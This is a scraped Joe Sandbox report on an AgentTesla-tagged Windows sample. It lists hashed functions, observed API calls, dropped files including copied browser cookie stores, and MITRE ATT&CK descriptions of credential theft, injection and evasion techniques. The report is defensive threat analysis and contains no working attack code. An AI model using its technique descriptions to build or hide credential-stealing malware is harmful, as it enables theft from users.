Instruction ID: 962f76a914c83cea793425416303c5291ac5df8ecb51c17dce5e3c3fca9fb5c1
Opcode Fuzzy Hash: 519f92d3c908bd713cb74284416c7ad21b2803176d148f6a277f3839d9ae3033
Instruction Fuzzy Hash: 2E41D4B0E0121A9BCB04CFAAC5405EEFBF2BF89300F24D569C405B7214D7349A429F95

Function 07E21810 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a60a9dd13d52a3ef626fef700974a4fe2783aff26d99f100fea5572082b2eb9
Instruction ID: f0779dd0aa22c464e966564ea555c09914c6d47c994b66da3405d95897ea3f4d
Opcode Fuzzy Hash: 5a60a9dd13d52a3ef626fef700974a4fe2783aff26d99f100fea5572082b2eb9
Instruction Fuzzy Hash: 2611DDB1E156188FEB5DCF6B98446DEFBF3AFC9200F04C07AD908A6268DB3406568F51

Function 01537CC8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 01537CDE
\;]q, xrefs: 01537CFA
\;]q, xrefs: 01537D06
\;]q, xrefs: 01537CD4

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 13cbc96dbc699f0ebda0c4d39ca69d6e66f39929881ef4e6c19abbd5dfc98b9a
Instruction ID: 3ded36ac614700942aaad76a547b8c91961eecbdf9c1bb9db54208d80af978cd
Opcode Fuzzy Hash: 13cbc96dbc699f0ebda0c4d39ca69d6e66f39929881ef4e6c19abbd5dfc98b9a
Instruction Fuzzy Hash: B00171B2B401198F97688E2DC498A3977EAFFCC6607254D6AE501CF371DA31DC41C790

Analysis Process: InstallUtil.exePID: 2968, Parent PID: 5812COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	259
Total number of Limit Nodes:	41

Executed Functions

Function 06C337D0 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463069d5e3590f5cebd51f2cd3507cac862ef7fe0b9355d2f74f26463af1c55e
Instruction ID: 61dc6a10af2ee37facc5f0000d6b0b0de719a00ca947ed4d130e28bb1a7437cf
Opcode Fuzzy Hash: 463069d5e3590f5cebd51f2cd3507cac862ef7fe0b9355d2f74f26463af1c55e
Instruction Fuzzy Hash: BAF16B30E002A9CFDB54DFA9D844BADBBF1BF48304F158559E809AB365DB74E945CB80

Function 06AF69D8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3fa02d0e0e683c96fc933f2a0c7b3fba3d17bcaaa84cd30122765c9ec7af042b
Instruction ID: d595483692ad5a948c623e706a58bba342c644cfcfc6e787a6c34e9784e89f5f
Opcode Fuzzy Hash: 3fa02d0e0e683c96fc933f2a0c7b3fba3d17bcaaa84cd30122765c9ec7af042b
Instruction Fuzzy Hash: B7711470A10B058FD764EF69D44079ABBF5FF88304F00892DE58ADBA50DB75E845CB91

Function 06AF8F0A Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF9022

Memory Dump Source

Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 34a02552e36e6c594c6ab77b483147c6d8360f54e50c7a7b12b45aab847795e0
Instruction ID: 32015f438d63b79222dcc9f8e2dc0acbe734db9bc25118c04904cfa285560795
Opcode Fuzzy Hash: 34a02552e36e6c594c6ab77b483147c6d8360f54e50c7a7b12b45aab847795e0
Instruction Fuzzy Hash: 2651C0B1D10349DFDB14DF99C884ADEBBB6FF48300F24822AE518AB210D7759985CF91

Function 06AF8F10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AF9022

Memory Dump Source

Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 05e267c26b73e96a573bfefa8baf03b6499ad11b93d3d845a2afd173072999b2
Instruction ID: fcc19e086a63d63077339f3abe2195621a10e0feb3baf5b093bbcb5d6d78f372
Opcode Fuzzy Hash: 05e267c26b73e96a573bfefa8baf03b6499ad11b93d3d845a2afd173072999b2
Instruction Fuzzy Hash: FB41D2B1D10349DFDB14DF9AC884ADEBBB5FF48310F24812AE518AB210D7759945CF91

Function 06C31080 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06C31141

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 47e40156777ed41aae1817e0d1752325b0a4a6130c1cb799a1223487e02fc95e
Instruction ID: ba9951034efb296e2e61b700035287dc494d1f3d99c72f9cfd1574be89e1eb91
Opcode Fuzzy Hash: 47e40156777ed41aae1817e0d1752325b0a4a6130c1cb799a1223487e02fc95e
Instruction Fuzzy Hash: A24129B4900359CFDB54CF99C848AAABBF5FF88314F28C459D519A7321D375A941CFA0

Function 0190AE38 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190AEC7

Memory Dump Source

Source File: 00000004.00000002.3311533054.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1900000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d567237e6615a4442ba171b99eda49945b09f8334ae56fd64c66db772de96426
Instruction ID: fd4618f3cb0ea5fcf9dd9cf28ca9180ed9acf1a9757af4ec91c4d396abe0b07b
Opcode Fuzzy Hash: d567237e6615a4442ba171b99eda49945b09f8334ae56fd64c66db772de96426
Instruction Fuzzy Hash: E62124B58013489FDB11CFA9D984ADEBFF8EF08310F14845AE958A7351C378A954CFA1

Function 0190AE40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190AEC7

Memory Dump Source

Source File: 00000004.00000002.3311533054.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1900000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 397c6d5dba7692245703962abc0c54e787336aff016b94a3571d88eda5d0f21e
Instruction ID: 46899a03dfddd0d3891fe2068e15fb2ec8af6980be32f75866c39c24cb0e15b0
Opcode Fuzzy Hash: 397c6d5dba7692245703962abc0c54e787336aff016b94a3571d88eda5d0f21e
Instruction Fuzzy Hash: EF21B0B59012489FDB10CFAAD984ADEBBF9EB48310F14841AE918A3250D379A954CFA5

Function 06AF593C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06AF69F4), ref: 06AF6C2E

Memory Dump Source

Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0768276b0a6f1d3a407e1931c3369fc20839ee69e3c78a34427d9405536cd93b
Instruction ID: 23a71bbd0ccdb00183dbf10a37ce5ea44c1f96f5d65158df928dfa27a6ec6124
Opcode Fuzzy Hash: 0768276b0a6f1d3a407e1931c3369fc20839ee69e3c78a34427d9405536cd93b
Instruction Fuzzy Hash: D21102B5D003498FDB20DF9AC444A9EFBF4EF48310F10846AE559B7200C379A545CFA1

Function 06C335B0 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06C3360D

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0ad14b75c39241a5d876a8241516b4a8f8ea441437c8094d7b5b807a382fe7bf
Instruction ID: 1e39f72c4c834baf4066b05cc8cfa6f192bdb5f814330048b28cf3c279e0c2fd
Opcode Fuzzy Hash: 0ad14b75c39241a5d876a8241516b4a8f8ea441437c8094d7b5b807a382fe7bf
Instruction Fuzzy Hash: 031103B58003889FCB20DF9AD445BDEBBF8EB48310F20845AD519A7300D379A684CFA5

Function 06C32680 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06C3360D

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 280bf5141e20814a82aa743d3e32e12de87ca8c94f7c97ab59ec2cb70cb1363a
Instruction ID: c5e8b8b0eda1d96a2d914407d6d7722336cb515a7d51661d49acbaf865aff742
Opcode Fuzzy Hash: 280bf5141e20814a82aa743d3e32e12de87ca8c94f7c97ab59ec2cb70cb1363a
Instruction Fuzzy Hash: EA1112B18003988FDB20DF9ED448BDEBBF8EB48320F208459D519A7300C379AA44CFA5

Function 06C335C3 Relevance: 1.5, APIs: 1, Instructions: 36comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06C3360D

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f1289bbcdf656ecfa3e08a3de53900625ad9dcc359d88bbedc44de1b0f0f2f08
Instruction ID: 76d801a002a85861d0e3b938dc6abfbb065c66f007e785115b656faab15ee1d3
Opcode Fuzzy Hash: f1289bbcdf656ecfa3e08a3de53900625ad9dcc359d88bbedc44de1b0f0f2f08
Instruction Fuzzy Hash: 62011CB58002888FCB20DF9AD4847CEFBF4EB48320F24845AD519A7310C379AA84CFA4

Function 06C3360B Relevance: 1.5, APIs: 1, Instructions: 20comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06C3360D

Memory Dump Source

Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 680029a1a5ceb5cdd8b835d3f16497365275da28569f1518cbddabc331cdabb8
Instruction ID: 99f68b601c59fa7b0d659bd8740916ee0c16cb438722e119232f9df423a9b432
Opcode Fuzzy Hash: 680029a1a5ceb5cdd8b835d3f16497365275da28569f1518cbddabc331cdabb8
Instruction Fuzzy Hash: B1E08C729003448EDB20ABAEE4083C9FBE0EF85324F25845AC11DD7220C6799588CB90

Function 016BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3310528886.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16bd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f375f64352aeaf7232e13296c0ed874c6f03cf9a0c6c1b08f09c5167fe5333
Instruction ID: d236bcf2d2b11fa3576fe021709861137d884e6b88d5e2f178bc617920ba388e
Opcode Fuzzy Hash: 76f375f64352aeaf7232e13296c0ed874c6f03cf9a0c6c1b08f09c5167fe5333
Instruction Fuzzy Hash: E8210071604200DFCB15DFA8D9C0B26BF65EB88318F20C569D90A0F396C33AD487CB61

Function 016BD006 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3310528886.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16bd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3397ee1f5f3febeae0b64ed466628006503561dfc82dbc0279e2308a7e37ac03
Instruction ID: 88a9fc8590cd069fd756ee1ffffc4c7bd02bd06688cd2fceb9e95475aff2cbcc
Opcode Fuzzy Hash: 3397ee1f5f3febeae0b64ed466628006503561dfc82dbc0279e2308a7e37ac03
Instruction Fuzzy Hash: 2C219F755093808FDB03CF24D9D4B15BF71EB46218F28C5DAD8498F2A7C33A984ACB62

Function 016AD628 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3310447593.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16ad000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d985ece1938de6762cb916f836615965cad18fb1ded7570efe6a5e3dc2e3c1
Instruction ID: 01e427722c940c98e6f99c89c770ee6101558aa6f8a23ca02bee07459c37ff1d
Opcode Fuzzy Hash: 45d985ece1938de6762cb916f836615965cad18fb1ded7570efe6a5e3dc2e3c1
Instruction Fuzzy Hash: 46F0C2710043549EE7208F0ACC84B66FFA8EF42324F18C45AED0C0A687C3799840CBB1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report umVoLahqZn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\umVoLahqZn.exe.log

C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Chrome\Default\Network\Cookies

C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Edge Chromium\Default\Network\Cookies

C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
umVoLahqZn.exe

Function 07C306E0 Relevance: 9.6, Strings: 7, Instructions: 837
COMMON

Function 07CB401E Relevance: 6.8, Strings: 3, Instructions: 3074
COMMON

Function 01538370 Relevance: 6.7, Strings: 5, Instructions: 442
COMMON

Function 07C54535 Relevance: 5.5, Instructions: 5517
COMMON

Function 07C54560 Relevance: 5.5, Instructions: 5499
COMMON

Function 07C34A58 Relevance: 5.2, Instructions: 5237
COMMON

Function 07E2C1D8 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Function 01538A98 Relevance: 10.5, Strings: 8, Instructions: 451
COMMON

Function 01535D28 Relevance: 8.9, Strings: 7, Instructions: 183
COMMON

Function 0153B828 Relevance: 8.8, Strings: 7, Instructions: 91
COMMON

Function 0153B818 Relevance: 6.3, Strings: 5, Instructions: 87
COMMON

Function 01535D19 Relevance: 5.1, Strings: 4, Instructions: 98
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
